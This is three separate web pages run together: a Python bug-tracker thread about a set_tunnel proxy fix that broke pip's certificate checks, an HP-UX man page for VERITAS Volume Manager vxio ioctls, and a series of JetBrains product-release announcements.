
New changeset 2c9af09ba7b8 by Senthil Kumaran in branch 'default': merge from 3.4

This is fixed in 3.4 and 3.5 (finally). I will port it to 2.7 as well.

I get errors when using pip with a proxy in 3.4.1rc1 on Windows, that does not happen on 3.4.0. I tracked it down to this change to client.py. OK with client.py from fd2c69cedb25, but not with client.py from 39ee3286d187.

    C:\Python34\Scripts>set HTTP_PROXY=
    C:\Python34\Scripts>set HTTPS_PROXY=
    C:\Python34\Scripts>pip -v install simplejson
    Downloading/unpacking simplejson
      Could not fetch URL: connection error: hostname 'openwrt.lan' doesn't match either of '*.c.ssl.fastly.net', 'c.ssl.fastly.net', '*.target.com', '*.vhx.tv', '*.snappytv.com', '*.atlassian.net', 'places.hoteltonight.com', 'secure.lessthan3.com', '*.atlassian.com', 'a.sellpoint.net', 'cdn.upthere.com', '*.tissuu.com', '*.issuu.com', '*.kekofan.com', '*.python.org', '*.theverge.com', '*.sbnation.com', '*.polygon.com', '*.twobrightlights.com', '*.2brightlights.info', '*.vox.com', 'staging-cdn.upthere.com', '*.zeebox.com', '*.beamly.com', '*.aticpan.org', 'stream.svc.7digital.net', 'stream-test.svc.7digital.net', '*.articulate.com', 's.t.st', 'vid.thestreet.com', '*.planet-labs.com', '*.url2png.com', 'turn.com', '', 'rivergathering.org', 'social.icfglobal2014-europe.org', '*.innogamescdn.com', '*.pathable.com', '*.staging.pathable.com', '*.kickstarter.com', 'sparkingchange.org', '', '', 'js-agent.newrelic.com', '*.fastly-streams.com', 'cdn.brandisty.com', 'fastly.hightailcdn.com', '*.fl.yelpcdn.com', '*.feedmagnet.com', 'api.contentbody.com', '*.acquia.com', '*.swarmapp.com', '*.lonny.com', '*.stylebistro.com', '*.zimbio.com', '*.pypa.io', 'pypa.io', 'static.qbranch.se', '*.krxd.net', '*.room.co', '*.metrological.com', 'room.co', '', 'my.ibmserviceengage.com', 'cdn.evbuc.com', 'cdn.adagility.com'
      Will skip URL when looking for download links for simplejson

On 05/09/2014 02:02 PM, Cybjit wrote:
> C:\Python34\Scripts>pip -v install simplejson
> Downloading/unpacking simplejson
>   Could not fetch URL: connection error: hostname 'openwrt.lan' doesn't match either of '*.c.ssl.fastly.net', 'c.ssl.fastly.net', ...

This looks as if pip tries to match the hostname in the certificate from pypi.python.org against the hostname of the local proxy. Looking at the code, I don't see why it would do that though. HTTPSConnection.connect definitely tries to match against the final hostname. Is pip maybe doing its own certificate check, and relying on HTTPSConnection.host to contain the final hostname rather than the proxy?
On 2014-05-10 00:23, nikratio wrote:
> Is pip maybe doing its own certificate check, and relying on
> HTTPSConnection.host to contain the final hostname rather than the proxy?

I think the culprit might be here

Cybjit <report@bugs.python.org> writes:
> Cybjit added the comment:
>
> On 2014-05-10 00:23, nikratio wrote:
>> Is pip maybe doing its own certificate check, and relying on
>> HTTPSConnection.host to contain the final hostname rather than the proxy?
>
> I think the culprit might be here

Yes, that's the problem. I guess that nicely demonstrates why using inheritance as an API is not a good idea. I guess we nevertheless need to repair/work around this in Python 3.4? Unfortunately pip explicitly relies on _set_tunnel() to set self.host = self._tunnel_host. So we would need to change _set_tunnel() to save the original attribute somewhere, change the other methods to use the saved attribute in favor of the real one, and have connect() restore it (so that we can reconnect). This still would not allow pip to reconnect (because it overwrites the connect method), but then reconnecting a tunneled connection with pip did not work before either. Still, rather ugly.

Alternatively, maybe we could also do nothing, because if pip is depending on undocumented semantics of a private method (_set_tunnel), they have to live with the consequences?

Thinking about this, I think we should just revert the entire patch for 3.4, but keep it in for 3.5. That gives the pip folks enough time to fix their code. Fixing the issue in 3.4 is probably not that crucial (after all, it existed since about 2.6).

Should this be a release blocker regression for 3.4.1? dstufft, what do you think?

Let me raise the issue with urllib3 and see if maybe we can get a quick turn around and just fix it for real.
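The incompatibility under discussion can be made concrete with a hypothetical helper: code doing its own certificate check must verify against the tunnel target, because after the fix .host keeps the proxy's name. The attribute names mirror http.client's private internals; the classes below are stand-ins, not anything from pip or urllib3:

```python
# Hypothetical illustration of the point above: when a tunnel is
# configured, a hostname check must use the tunnel target, not .host.

def cert_check_host(conn):
    """Return the hostname a TLS certificate should be matched against."""
    tunnel_host = getattr(conn, "_tunnel_host", None)
    return tunnel_host if tunnel_host else conn.host

class TunneledConn:  # stand-in for an HTTPSConnection through a proxy
    host = "openwrt.lan"              # the proxy (post-fix behaviour)
    _tunnel_host = "pypi.python.org"  # the real endpoint

class DirectConn:    # stand-in for a direct connection, no tunnel
    host = "pypi.python.org"

assert cert_check_host(TunneledConn()) == "pypi.python.org"
assert cert_check_host(DirectConn()) == "pypi.python.org"
```

Code that instead read conn.host unconditionally worked only as long as _set_tunnel() clobbered it with the tunnel target, which is exactly the undocumented behaviour the fix removed.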
This is going to break existing versions of urllib3 (and thus requests and thus pip) when using verified TLS + a proxy; however, future versions can work around it and a fix is being looked at right now. Once it's fixed there it can propagate to requests and then to pip. The urllib3 issue is here

As far as what CPython should do: I personally don't think 3.4.1 should go out with this broken. That'll mean either getting a new pip out with the fix and bumping the bundled version in CPython, or reverting this patch and waiting till 3.5 (or 3.4.2 if you don't want to hold up 3.4.1).

Just an update: the issue is fixed in urllib3 and that has been pulled into requests. Requests is currently prepping to release a new version, which I'll pull into pip and issue a pip 1.5.6 release, which can be pulled into CPython and should fix this.

I am glad that the issues with third-party libs which depended on the previous wrong behavior have been resolved. As indicated previously, I think it makes sense to have this in 2.7 as well. I created a patch and tested it on 2.7 and it is all good. I plan to commit it before the next 2.7 update (which should be tomorrow).

New changeset 568041fd8090 by Senthil Kumaran in branch '2.7': Backport Fix for Issue #7776: Fix ``Host:'' header and reconnection when using http.client.HTTPConnection.set_tunnel().

This is fixed in 2.7 as well here (changeset 568041fd8090). We shall close this ticket after @dstufft pulls in the updated pip for 3.4. Thanks!

Requests has been released and I've pulled it into the pip tree. I'll be releasing tonight probably, or maybe tomorrow.

I tag 3.4.1 final in less than 24 hours. I really would prefer that the embedded pip not contain such, uh, fresh software. But let's try it and hope for the best.

Well, you're the RM, Larry :) I'll do whatever you think is best. I would greatly prefer it if the pip shipped with CPython 3.4.1 wasn't broken with proxies.
I think the choices are:
1) Ship it with the new pip; I can give a delta of the differences if that is helpful.
2) Roll back the patch that broke the behavior.
3) Ship with broken pip + proxy behavior.

Whichever you think is the better option is fine with me.

Yeah, I'd like to see the diff.

Just FYI, I upgraded setuptools and pip in 3.5: If you decide to go that way, dunno if you can just cherry-pick or not.

I prefer we update the ensurepip in 3.4.1. That will be helpful too since 3.5 has the fix.

@larry Is there anything else I need to do?

@dstufft - should you commit it in the 3.4 branch (since the change is already in 3.5) and then wait for larry's approval or rejection?

Okay, this has my blessing to be merged for 3.4.1.
https://bugs.python.org/issue7776
vxio(7) VxVM 3.5 vxio(7) 1 Jun 2002

NAME
vxio - VERITAS Volume Manager virtual disk devices

DESCRIPTION
Volume devices are the virtual disk devices in VERITAS Volume Manager (VxVM). The volume devices support a virtual disk access method with disk mirroring and disk striping. A volume is a logical entity composed of one or more plexes. A read can be satisfied from any plex, while a write is directed to all plexes. The virtual disk devices have a wide variety of behaviors, which are programmable through the /dev/vx/config device. For volume devices, both block- and character-special devices are implemented.

Each plex in the volume is a copy of the volume address space. The plex has subdisks associated with it. These subdisks provide backup storage for the volume address space. It is possible to create a sparse plex, which is a plex without backup storage for some of the volume address space. The areas of a sparse plex that do not have a backing subdisk are called holes. An attempt to read a hole in a sparse plex fails. If there are other plexes that have backup storage for the read, then one of those plexes is read. Otherwise, the read fails. A write to a hole in a sparse plex is considered a success even though the data can't be read back.

In addition, a plex may be designated as a logging plex. This means that a log of blocks that are in transition will be kept, which enables fast recovery after a system failure. This feature is known as DRL, or dirty region logging. The log for each plex consists of a specially designated subdisk that is not part of the normal plex address space.

IOCTLS
The ioctl commands supported by the volume virtual disk device interface are discussed later in this section. The format for calling each ioctl command is:

    #include <sys/types.h>
    #include <sys/volclient

The return value from these ioctls, with some exceptions, is zero if the command was successful, and -1 if it was rejected.
If the return value is -1, then errno is set to indicate the cause of the error.

The following ioctl commands are supported:

GET_DAEMON
This ioctl returns the pid of the process with the /dev/vx/config device open, or 0 if it is not open.

PLEX_DETACH
This command is used to force a plex to be detached from a volume. The name of the plex is passed in as an argument. The volume is the volume device against which the ioctl is being performed.

VOL_LOG_WRITE
This command forces a dirty region log to be flushed to disk. This is used by the vxconfigd process to flush an initial log to disk before starting the volume.

VOL_READ, VOL_WRITE
These commands provide a mechanism by which I/O can be issued to volumes larger than 2 gigabytes in length. Current UNIX read and write system calls on 32-bit processors limit sizes to 2 gigabytes because of the signed byte-offset value used to perform the I/O. These ioctl commands provide a method of providing sector offsets to an I/O and raise the limit to one sector less than 1024 gigabytes. The required I/O is identified to the command by the use of a vol_rdwr structure containing the following:

    ulong_t vrw_flags;  /* flags */
    voff_t  vrw_off;    /* offset in volume (sectors) */
    size_t  vrw_size;   /* number of sectors to Xfer */
    caddr_t vrw_addr;   /* user address for Xfer */

The vrw_flags field is currently unused; other fields are explained in the comments.

VOLUME-SPECIAL IOCTLS
The ATOMIC_COPY, VERIFY_READ, and VERIFY_WRITE ioctls perform special I/O operations against the volume. They use the vol_io structure to initiate I/O requests and receive the status information back.
The members of the vol_io structure are:

    voff_t  vi_offset;          /* 0x00 offset on plex */
    size_t  vi_len;             /* 0x04 amount of data to read/write */
    caddr_t vi_buf;             /* 0x08 ptr to buffer */
    size_t  vi_nsrcplex;        /* 0x0c number of source plexes */
    size_t  vi_ndestplex;       /* 0x10 number of destination plexes */
    struct plx_ent *vi_plexptr; /* 0x14 ptr to array of plex entries */
    ulong_t vi_flag;            /* 0x18 flags associated with op */

The members of the plx_ent structure are:

    char pe_name[NAME_SZ]; /* name of plex */
    int  pe_errno;         /* error number against plex */

The vi_offset value specifies the sector offset of the I/O within the volume. It must be within the address range of the volume. Also, the entire range of the I/O from vi_offset to vi_offset + vi_len must be within the address range of the volume. The vi_len field specifies the length of the I/O in sectors. It must be between 0 and 120 sectors (VOL_MAXSPECIALIO). The vi_buf field is a pointer to a buffer of vi_len sectors. The VERIFY_WRITE ioctl writes the data stored in this buffer.

The vi_nsrcplex field is the number of source plexes available for the operation and the vi_ndestplex field is the number of destination plexes available for the operation. The vi_nsrcplex and vi_ndestplex values must be between 0 and 8 (PLEX_NUM). The vi_plexptr is a pointer to an array of plx_ent structures. The first vi_nsrcplex entries in the array are source plexes. The pe_name contains the name of the plex. If the name of the first source entry is the null string, then the kernel selects all plexes available for reading as part of the volume and fills in the pe_name fields. After the source plexes, the next vi_ndestplex entries are the destination plexes. If the name of the first destination entry is the null string, then the kernel selects all plexes available for writing as part of the volume and fills in the pe_name fields.
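The hex offsets in the vol_io comments (0x00 through 0x18) pin down a 32-bit layout of seven 4-byte fields. As an illustration outside the man page's C context, a ctypes mirror can check that arithmetic; NAME_SZ is an assumption (the man page does not give its value), and pointers are shown as 32-bit integers to match the documented offsets:

```python
# ctypes mirror of the vol_io / plx_ent layouts described above,
# purely to verify the documented offsets.  NAME_SZ is assumed;
# pointer fields are modeled as 32-bit integers per the offsets.
import ctypes

NAME_SZ = 32  # assumed; not specified in the man page text

class PlxEnt(ctypes.Structure):
    _fields_ = [
        ("pe_name", ctypes.c_char * NAME_SZ),  # name of plex
        ("pe_errno", ctypes.c_int),            # per-plex error code
    ]

class VolIo(ctypes.Structure):
    _fields_ = [
        ("vi_offset", ctypes.c_uint32),    # 0x00 offset on plex (sectors)
        ("vi_len", ctypes.c_uint32),       # 0x04 sectors to read/write
        ("vi_buf", ctypes.c_uint32),       # 0x08 ptr to buffer
        ("vi_nsrcplex", ctypes.c_uint32),  # 0x0c number of source plexes
        ("vi_ndestplex", ctypes.c_uint32), # 0x10 number of dest plexes
        ("vi_plexptr", ctypes.c_uint32),   # 0x14 ptr to plx_ent array
        ("vi_flag", ctypes.c_uint32),      # 0x18 flags
    ]

# Total size follows from the last offset: 0x18 + 4 bytes = 0x1c.
assert ctypes.sizeof(VolIo) == 0x1C
```

In real use such a structure would be packed and passed to the driver through ioctl(2) on the raw volume device; the sketch above only demonstrates the layout.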
After the I/O operations are performed, the plx_ent structures are copied back to the user. If the kernel selected the plexes, the names of the selected plexes are in the pe_name fields. The status of the operations on each plex are stored in the pe_errno field of the plx_ent structure for that plex. The pe_errno field is 0 if the operation succeeded against the plex. If pe_errno isn't 0, then the error code indicates what happened to the plex. The possible values for pe_errno are:

EACCES
The specified plex is in the disabled state, so no I/O can be performed against it.

EFAULT
A source plex is sparse and doesn't have blocks that map the entire I/O request.

EIO
A read I/O error was returned against a source plex.

ENOENT
The specified plex isn't associated with the volume the ioctl was issued against.

ENXIO
An error was detected in the operation, so no I/O operation was attempted to the plex. If one plx_ent structure in a list contains a bad name, then no I/O is done. All plx_ent structures with a valid name have their pe_errno set to ENXIO to indicate no I/O was attempted.

EROFS
A write I/O error was returned against a destination plex.

ESRCH
The VERIFY_READ and VERIFY_WRITE operations compare the data from different plexes against each other to verify the consistency. If the comparison detects an error, the plex that was read first is considered correct. An ESRCH error is returned against the plex that was read second to indicate it contains bad data.

For the ATOMIC_COPY, VERIFY_READ, and VERIFY_WRITE ioctls, if the entire operation is a success, then a 0 is returned. If there is a fatal error, a -1 is returned and the external variable errno indicates the reason for failure. If a 1 is returned, there was some sort of failure and the net results must be determined by examining the pe_errno fields of all the plexes.
The ioctls that do volume-special I/O are:

ATOMIC_COPY
This ioctl takes a pointer to a vol_io structure as an argument. It reads vi_len sectors of data, at offset vi_offset, from one of the plexes specified by the first vi_nsrcplex plex entries into a buffer. Then it writes the contents of the buffer onto all the plexes specified by the next vi_ndestplex plex entries at the same offset. This entire operation is atomic with respect to the I/O stream of the volume. The vi_buf field is unused and should be NULL.

If the first source plex entry has a null string for the name, the kernel selects from any plex of the volume that is enabled for read access. The names of any selected plexes are copied into the appropriate plex entries. If the first destination plex entry has a null string for the name, the kernel will write to all plexes of the volume that are enabled for write access. The names of selected plexes are copied into the appropriate plex entries.

When the list of source plexes has been compiled, the kernel tries to read each plex in order. A plex can't be read if it doesn't have backup storage covering the entire operation. Once a plex has been successfully read, all the destination plexes are written. The writes can succeed even if the destination plex is sparse and doesn't have backup storage to cover the entire write.

If the ioctl returns a value of -1, then some error has occurred which prevented the ATOMIC_COPY from working. If the return value is 0, then everything worked fine. If the return value is 1, then the pe_errno field must be examined to determine the errors on each individual plex. The status of the overall operation depends on these individual errors.

VERIFY_READ
This command accepts a pointer to a vol_io structure as an argument. It reads vi_len sectors, from offset vi_offset, on the first vi_nsrcplex plexes specified by the vi_plexptr array of plex entries. It compares the data from each plex.
If any plex is different from the previous plexes read, the pe_errno value for that plex is set to ESRCH. This entire operation is atomic with respect to the I/O stream of the volume. The vi_ndestplex field must be 0. If the vi_buf field is not NULL, then the data read from the plexes not marked with ESRCH is copied into the buffer specified by vi_buf.

As each plex is read, any data that has already been read is compared against the previous reads. If all the data for the plex passes, then any data that was read for the first time is copied into the comparison buffer. This allows VERIFY_READ operations to work if the volume contains sparse plexes. The data not represented by backup storage is not compared against anything.

VERIFY_WRITE
This command accepts a pointer to a vol_io structure as an argument. It writes vi_len sectors to offset vi_offset on the first vi_ndestplex plexes specified by the vi_plexptr array of plex entries. The data to be written is stored in the buffer pointed to by vi_buf. Then, the data is read back from each plex that was successfully written and is compared against the data written. If the data from any plex doesn't match the data written, the pe_errno value for the plex is set to ESRCH. This entire operation is atomic with respect to the I/O stream of the volume. The vi_nsrcplex field must be 0.

As each plex is read, any data that doesn't have backup storage on that plex is filled in from the write buffer. This allows VERIFY_WRITE operations to work if the volume contains sparse plexes. The data not represented by backup storage will always succeed.

VOL_LOG_WRITE
This command takes no argument, and causes the log for a volume to be written to disk immediately. This command is useful for making sure that the on-disk images of the log have been written. This command returns -1 with errno set to EINVAL if the specified volume does not have logging enabled.
PLEX_DETACH
This command allows an enabled plex to be detached. The argument is the name of the plex to detach.

DIAGNOSTICS
The following errors are returned by volume virtual disk device interfaces:

EAGAIN
A needed kernel resource couldn't be obtained.

EBADF
An attempt was made to write a volume that wasn't opened for writing or read a volume that wasn't open for reading.

EFAULT
A pointer passed to the kernel was invalid, causing a bad memory reference.

EINVAL
Invalid data was passed to the kernel. Some field in a vol_io structure failed a sanity check.

EIO
A physical I/O error occurred during an operation. If this error is returned, the driver tried an I/O and it failed.

EMFILE
The kernel was asked to supply a list of destination plexes for an ATOMIC_COPY or VERIFY_WRITE ioctl. If more than vi_ndestplex enabled plexes available in write mode are found, an EMFILE error is returned.

ENFILE
The kernel was asked to supply a list of source plexes for an ATOMIC_COPY or VERIFY_READ ioctl. If more than vi_nsrcplex enabled plexes available in read mode are found, an ENFILE error is returned.

ENOENT
An object named in a GET_VOL_STATS ioctl was not associated with the volume.

ENOENT
The kernel was asked to supply a list of destination plexes for an ATOMIC_COPY or VERIFY_WRITE ioctl. If no enabled plexes available in write mode are found, an ENOENT error is returned.

ENXIO
A validation error occurred during an I/O operation. If this error is returned, the driver attempted no I/O.

ESRCH
The kernel was asked to supply a list of source plexes for an ATOMIC_COPY or VERIFY_READ ioctl. If no enabled plexes available in read mode are found, an ESRCH error is returned.

FILES
/dev/vx/dsk/*
Volume block device files.

/dev/vx/rdsk/*
Volume character (raw) device files.

SEE ALSO
ioctl(2), vxconfig(7), vxiod(7), vxtrace(7)
http://modman.unixdev.net/?sektion=7&page=vxio&manpath=HP-UX-11.11
JetBrains News

JetBrains Upsource 2.5 is released!

We have some exciting news for you today as we've just released Upsource 2.5! Our code review tool is now significantly faster and noticeably smarter. Upsource introduces a redesigned Review page, smart email notifications with a reply-by-email option, discussion labels, a brand new Branches page, and of course a number of improvements in the IDE plugin. Eager to try the new version? Download it here!

Updates for all JetBrains Toolbox products as new licensing model is launched

Today is a big day because we've updated the whole JetBrains Toolbox, which includes all our desktop tools, and also launched our new subscription-based licensing model for these products. Here is a short summary and highlights of each update:

- ReSharper Ultimate 10 — adds many new features related to the debugger, coding assistance, built-in tools, support of languages and frameworks, and more.
- PhpStorm 10 — brings improvements in PHP language support, editing experience, debugging, code analysis, and many other powerful features.
- WebStorm 11 — adds support for TypeScript 1.6, Flow and Angular 2, integration with Yeoman, and thorough improvements.
- PyCharm 5 — brings an outstanding lineup of new features, including full Python 3.5 support, Docker integration, Thread Concurrency Visualization, and more.
- AppCode 3.3 — adds support for Xcode 7, Objective-C generics and multiple Swift 2 features.
- CLion 1.2 — introduces Google Test support, productivity features for CMake, C++ debugger performance improvements, new VCS features and more.
- RubyMine 8 — brings improved experience in managing gems with Rbenv gemsets and a better Bundler, faster debugger and more.

One important addition that JetBrains Toolbox makes possible is a special 'All Products' plan allowing you to use any product from the list depending on your current needs. Note that you do not have to switch to the new model immediately.
Your valid upgrade subscription still works and will work until its expiration date. After that you will be able to switch to the new model. You are welcome to check JetBrains Toolbox pricing and terms & conditions at jetbrains.com/store. Please contact us if you have any questions.

PyCharm Edu 2: Simple is better than complex

Please welcome PyCharm Edu 2, the newest release of our free and easy-to-use IDE for learning and teaching programming with Python. Inspired by the motto "Simple is better than complex" from The Zen of Python, PyCharm Edu 2 introduces an even simpler user interface with brand new features to help novice programmers become professionals more quickly than ever before.

What's New in PyCharm Edu 2?

For novice programmers:
- Simplified step-by-step debugger
- Inline debugger
- Simplified UI
- Temporary Python Scratch files
- Quick Python packages installation

For course authors: Please see the what's new page for more details, learn how PyCharm Edu works and don't wait a moment longer — Download PyCharm Edu 2 and start your journey with Python programming today! For more details and learning materials, visit the PyCharm Edu website and check out the Quick Start guide to get rolling.

Welcome AppCode 3.2 release!

Today we are happy to share with you that AppCode 3.2 is officially available. We've put a lot of effort into this release. There are several other important changes. First, UI Designer has moved into an optional plugin. Second, we offer a separate distribution package targeting OS X Yosemite users with a custom bundled JDK, based on JDK 1.8, which includes fixes from the JetBrains team for several annoying problems that appeared in the JDK. Read more about that. And last but not least, please note that AppCode 3.2 officially supports Xcode 6.4 on OS X 10.10 and Xcode 6.2 on OS X 10.9. We've already shared some explanations in an earlier post talking about the release candidate.
Finally, please note that this update is free for all AppCode users with an active license subscription! To download the release build, please visit our site. For a more detailed overview, visit the What's new in AppCode 3.2 page.

Welcome ReSharper 9.2, ReSharper C++ 1.1 and More ReSharper Ultimate Updates

A new update to JetBrains ReSharper Ultimate is now available for download! This update includes ReSharper 9.2, dotTrace 6.2, dotCover 3.2, dotMemory 4.4, dotPeek 1.5, and ReSharper C++ 1.1.

ReSharper 9.2 highlights include:
- Improved support for Visual Studio XAML constructs.
- JavaScript and TypeScript support enhancements including full support for TypeScript 1.5 and ECMAScript 6, as well as support for regular expressions in JavaScript.
- If you have dotTrace installed and integrated in Visual Studio, you can launch profiling from the same Alt+Enter pop-up menu.

ReSharper C++ 1.1 comprises the following enhancements:
- The Includes Hierarchy view helps visualize dependencies between #include directives.
- Improved support for C++ core features, inline specifiers on a function definition and functions that can be const, as well as quick-fixes for these inspections. Automatic import now works with macros as well.
- A set of performance improvements, most notably ensuring that quick-fixes are immediately available on solution load.

All other ReSharper Ultimate tools have been enhanced as well:
- dotTrace 6.2 is highlighted with:
  - Analysis of incoming HTTP requests in Timeline mode to make your web applications faster.
  - Support for predefined run configurations to instantly profile any part of your code on the spot.
  - Updated command line tools supporting additional profiling functionality.
- Improving the Sunburst diagram for easier navigation in Visual Dominators view. - dotMemory Unit framework 2.0 receives a stand-alone launcher for continuous integration, and extends the list of supported unit testing frameworks. Download the updated ReSharper Ultimate as a single installer and give it a try! and download CLion for your operating system. YouTrack 6.5: Issue Tracker Designed for Development Teams Today we bring you YouTrack 6.5 featuring a number of integrations and revamped Administration and YouTrack configuration. We've redesigned these areas keeping your user experience as our main priority. The latest release also introduces: - Integration with BitBucket and GitLab - Upsource integration - One-click Jira import - Project Wizard The following parts of YouTrack have been enhanced as well: - GitHub and TeamCity integration - Dashboard, mailbox integration and workflow - Bug-fix versions included in the license - Mention @username notifications For more details visit the What's new page. Get YouTrack 6.5 to start enjoying better user experience in addition to the awesome issue tracking your development team is already used to. The latest version is available for download or cloud registration. Hub 1.0: Single Entry Point for All JetBrains Teamware Please welcome Hub 1.0, our brand new user management tool that works as a single entry point for all JetBrains teamware, including YouTrack, Upsource and TeamCity. Hub is absolutely free for an unlimited number of users, forever. Connect YouTrack and Upsource with Hub to get: - Single sign-on to YouTrack and Upsource - Unified user and permission management - Dashboard with widgets from all the tools - A project wizard that creates and links appropriate projects in all tools - Tools connected out of the box TeamCity will join the club with a special Hub plugin very soon. Please stay tuned for more news. 
Read more about how Hub connects JetBrains teamware into a fully integrated suite of tools, and download Hub free today.

TeamCity 9.1 released: Improved Versioned Settings, enhanced .NET support, security upgrades, and more

As of today, TeamCity 9.1, the latest version of your favorite Continuous Integration and Deployment server, is available for download. This minor release comes with a lot of big improvements. Here is what's new:
- Major improvements in Versioned Settings:
  - Create true historical builds, reproducing any of your builds at any point in time, dating back as far as your VCS allows
  - Different settings in different branches, for storing different build steps and parameters in different branches and applying them when needed
  - Personal builds with personal settings let you test-drive custom project settings, and apply them if a build is successful
  - Perforce and Subversion are now supported for Versioned Settings, adding to the previously available Git and Mercurial
- Enhanced support for .NET tools:
  - Support for NUnit 3.0 and guaranteed compatibility between all upcoming features of NUnit and TeamCity
  - VS 2015, MSBuild 2015, MSTest 2015, PowerShell 5, and TFS 2015 are fully supported, even before their official releases
  - MSTest and VSTest are combined into a single Visual Studio Tests Runner and supported out of the box
- TeamCity 9.1 comes with pumped-up security, introducing unidirectional agent-server communication which lets your agents establish a secure HTTPS connection with the server. 20+ important security improvements have also been implemented.
- UI and usability improvements:
  - Reorder projects to better represent your actual project structure
  - Reorder charts in a way that's most convenient for you and your team
  - Coloring and URLs in build logs make it easier to spot important details in logs

Please see What's New for more details and download TeamCity 9.1 for your server.

PhpStorm 9: Progress. Advance. Develop.
PhpStorm 9, the next big release of our IDE for PHP and web development, is already here. For more details please see What's New in PhpStorm 9 and download the IDE for your operating system. Don't miss our webinar overviewing the new features and improvements in PhpStorm 9, scheduled for July 22nd, 14:00 GMT. Click here to join the webinar.

Upsource 2.0 Introduces IDE Plugin, Streamlines Code Review

Meet a major update to the repository browser and code review tool from JetBrains: Upsource 2.0 is now available for download. If you have an existing license for Upsource 1.0, then 2.0 is a free upgrade for you. If you don't have an existing license, note that a 10-user plan is free anyway. The new Upsource release comes with numerous improvements across many areas, including the code review process, support for version control systems, and managing reviews from within the IDE. Here are some of the highlights of the release:
- Upsource 2.0 delivers an IDE plug-in for code review that works with IntelliJ IDEA, WebStorm, Android Studio and other IDEs built on the IntelliJ platform. The plug-in helps submit revisions for review and manage the code review cycle, shows review comments, and allows creating new comments right from within the text editor.
- Upsource 2.0 adds support for SVN branches along with Git and Mercurial branches. Other VCS improvements include support for Git and Mercurial tags, as well as setting up multiple VCS repositories in a single Upsource project.
- If your team is into Java development, you should know that Upsource 2.0 brings Java code inspections, navigation and search to Gradle-based projects, in addition to Maven, which was supported earlier. Upsource 2.0 can also compare Java code usages across revisions with a new action called View usages diff.
- Upsource 2.0 streamlines managing code reviews and taking part in them. For example, reviewer suggestions help authors find and assign appropriate reviewers faster.
  For reviewers, Upsource makes it possible to look through changes between any two revisions when inspecting a review.
- Multiple improvements to the commenting system include live comment preview, persisting comment drafts, and adding inline comments to the Review timeline for a quicker overview of things to be improved within a review.

Learn more and download Upsource 2.0.

PyCharm 4.5: All Python Tools in One Place

Please welcome PyCharm 4.5, an important new release of our intelligent IDE for Python, Django and Web development that unites even more tools and features, working smoothly in one place to bring a unique development experience. The key features in this release include:
- Python Profiler Integration
- Inline Debugger
- matplotlib interactive mode
- Ignore Library Files and Step into My Code debugger options
- Navigation From Variables View
- New and re-worked manage.py tool for Django projects
- Improved Django 1.8 code insight
- Bulk move refactoring
- New refactorings: Convert to module & Convert to package
- Significantly improved IPython Notebook integration with the new IPython Notebook console
- Temporary Python Scratch Files
- Initial support for Python 3.5
- Distraction-free mode
- And even more

For more details on these and other new features and changes in PyCharm 4.5, please see our What's New page and download the IDE for your platform.

RubyMine 7.1: Puppet improvements, better JavaScript and CoffeeScript, and more

We thought you'd be interested to know that RubyMine 7.1, an important update to our intelligent Ruby on Rails IDE, is now available for download. RubyMine 7.1 is focused on better integration with Puppet for managing project infrastructure, while also improving your web development experience. The following features are on board:
- Better Puppet integration: support for all the new features of Puppet 4, resolving externally defined symbols, and Puppet environments.
- Improved CoffeeScript support: the ?= operator, better navigation and formatting, and improved support for destructuring arrays and objects.
- Faster JavaScript: completely reworked support for large JavaScript code bases and lots of enhancements in ECMAScript 6 support.
- TypeScript 1.4 & 1.5 support and built-in compiler: support for union types, the let and const keywords, as well as decorators and ES6 modules; compiling to JS code with all the errors highlighted in the editor on the fly.
- Move class/module refactoring: this new refactoring moves a Ruby class or module to its own file, creates a hierarchy of directories, and adds a 'require' statement to the source file.
- Distraction-free mode: a minimalistic UI mode option with no toolbars, tool windows or tabs; ideal when you just need to focus on nothing but code.
- Simultaneous HTML tag editing: as you edit an opening HTML tag, RubyMine takes care of the closing one.

Other notable updates include the Ruby 2.2.x debugger, faster Vagrant commands, Phusion Passenger 5 support, and HiDPI support for Windows and Linux. To learn more about RubyMine 7.1, please visit our What's New page. You can buy or renew your RubyMine license on our website. This update is free for you if you have an active upgrade subscription valid as of April 15th, 2015.

CLion 1.0 has finally arrived!

We are really excited today to tell you that CLion 1.0, the very first release of our cross-platform C/C++ IDE, is here! CLion 1.0 highlights:
- C and C++ (including C++11 support, libc++ and Boost), as well as JavaScript, XML, HTML and CSS.
- Compatible with 64-bit Linux, OS X, and 64-bit Windows.
- Compilers:
  - GCC/G++ and Clang support on OS X and Linux;
  - MinGW 32/64 3.* or Cygwin 1.7.* on Windows.
- Bundled toolchains: CMake 3.1.2 and GDB 7.8 (except for Cygwin on Windows).
- CMake support, including:
  - Propagating CMake settings to the IDE, using CMake as a project model in CLion.
  - Automatic handling of CMake changes.
  - Auto-completion for CMake commands.
- CMakeCache editor.
- Powerful editor with autoformatting, multiple cursors, and smart completion.
- A range of one-click navigation options.
- Code generation features to save your time while coding.
- Reliable refactorings, including Rename, Change Signature, Extract Function/Constant/Define/Typedef, Pull Members Up, Push Members Down, and more.
- Integrated debugger.
- Integration with the most popular version control systems, including Subversion, Git, GitHub, Mercurial, CVS, Perforce (via plugin), and TFS.
- Terminal and Vim-emulation mode (via plugin).
- Keyboard-centric approach, with lots of popular keymaps supported and the ability to customize them.

You can download a 30-day free trial from our website and check out the Quick Start Guide to become familiar with the IDE.

ReSharper C++ is released along with updates to JetBrains .NET tools

We have just finalized a joint update to our .NET tools, added the first ever public version of ReSharper for C++, and the new release of ReSharper Ultimate is now available for download! This update consists of ReSharper 9.1, dotTrace 6.1, dotCover 3.1, dotMemory 4.3, dotPeek 1.4 and ReSharper C++ 1.0, a new product joining our ReSharper Ultimate family. In addition to 700+ fixes, ReSharper 9.1 highlights include:
- Improved support for Visual Studio 2015 and .NET 4.6. ReSharper 9.1 integrates actions based on Visual Studio's Roslyn, so when you want to make changes to your code, you can choose either ReSharper or Visual Studio to do it for you, all from the same Alt+Enter menu.
- Better C# 6.0 support that makes it easier to migrate an existing codebase to C# 6.0. In addition to language constructs such as static usings and exception filters, we have added support for string interpolation and the nameof() operator. To simplify migrating your projects to C# 6.0, ReSharper now offers quick-fixes to transform your code in the scope of a file, a project or the whole solution.
- JavaScript and TypeScript improvements, including JSDoc support, improved TypeScript 1.5 and ECMAScript 6 support, as well as full understanding of TypeScript 1.4.
- A new Evaluate expression context action that allows previewing the results of code execution right in the editor. For example, you can see what an exception message will look like at runtime, or check whether an expression returns the value it's supposed to return.
- Improved code completion: we have implemented a new mechanism that orders items by relevance, so that the best-fitting options are suggested higher in the code completion popup list.
